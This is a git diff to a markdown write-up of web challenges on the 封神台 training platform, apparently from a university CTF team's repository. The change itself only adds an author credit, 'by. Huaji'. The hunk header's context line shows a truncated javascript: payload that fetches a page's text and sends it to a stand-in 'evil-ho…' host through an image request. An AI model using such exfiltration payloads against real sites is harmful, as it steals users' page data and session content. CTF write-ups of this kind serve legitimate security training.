--- a/docs/web/封神台.md
+++ b/docs/web/封神台.md
@@ -204,6 +204,10 @@ javascript:fetch('/').then(r=>r.text()).then(s=>{new Image().src=`http://evil-ho
 
 ![image-20250810232917139](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251005192849244.png)
 
+<p style="text-align: right;">
+by. Huaji
+</p>
+
 
 
 
